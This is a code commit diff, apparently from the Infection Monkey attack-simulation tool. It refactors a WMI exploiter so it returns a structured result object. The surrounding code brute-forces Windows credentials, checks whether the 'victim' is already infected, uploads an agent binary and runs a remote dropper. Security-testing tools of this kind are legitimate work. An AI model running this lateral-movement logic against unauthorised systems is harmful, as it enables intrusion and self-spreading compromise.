Agent: modify wmiexec.py to return ExploitResultData

2022-03-08 15:11:21 +02:00 · 2022-03-08 15:11:21 +02:00 · aa5220b04a
parent c932a19b47
commit aa5220b04a
1 changed files with 9 additions and 12 deletions
--- a/monkey/infection_monkey/exploit/wmiexec.py
+++ b/monkey/infection_monkey/exploit/wmiexec.py
@ -12,6 +12,7 @@ from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.helpers import get_monkey_depth
 from infection_monkey.exploit.tools.smb_tools import SmbTools
 from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools
+from infection_monkey.i_puppet import ExploiterResultData
 from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
 from infection_monkey.utils.commands import build_monkey_commandline

@ -23,11 +24,8 @@ class WmiExploiter(HostExploiter):
    EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
    _EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)"

-    def __init__(self, host):
-        super(WmiExploiter, self).__init__(host)
-
    @WmiTools.dcom_wrap
-    def _exploit_host(self):
+    def _exploit_host(self) -> ExploiterResultData:

        creds = _get_exploit_user_password_or_hash_product(self.options["credentials"])

@ -50,16 +48,17 @@ class WmiExploiter(HostExploiter):

            except socket.error:
                logger.debug(f"Network error in WMI connection to {self.host}")
-                return False
+                return self.exploit_result

            except Exception as exc:
                logger.debug(
                    f"Unknown WMI connection error to {self.host}: "
                    f"{exc} {traceback.format_exc()}"
                )
-                return False
+                return self.exploit_result

            self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
+            self.exploit_result.exploitation_success = True

            # query process list and check if monkey already running on victim
            process_list = WmiTools.list_object(
@ -72,7 +71,7 @@ class WmiExploiter(HostExploiter):
                wmi_connection.close()

                logger.debug("Skipping %r - already infected", self.host)
-                return False
+                return self.exploit_result

            downloaded_agent = self.agent_repository.get_agent_binary(self.host.os["type"])

@ -89,7 +88,7 @@ class WmiExploiter(HostExploiter):

            if not remote_full_path:
                wmi_connection.close()
-                return False
+                return self.exploit_result
            # execute the remote dropper in case the path isn't final
            elif remote_full_path.lower() != self.options["dropper_target_path_win_64"]:
                cmdline = DROPPER_CMDLINE_WINDOWS % {
@ -119,7 +118,7 @@ class WmiExploiter(HostExploiter):
                )

                self.add_vuln_port(port="unknown")
-                success = True
+                self.exploit_result.propagation_success = True
            else:
                logger.debug(
                    "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
@ -130,14 +129,12 @@ class WmiExploiter(HostExploiter):
                    result.ReturnValue,
                    cmdline,
                )
-                success = False

            result.RemRelease()
            wmi_connection.close()
            self.add_executed_cmd(cmdline)
-            return success

-        return False
+        return self.exploit_result


 def _get_exploit_user_password_or_hash_product(credentials: Mapping) -> List: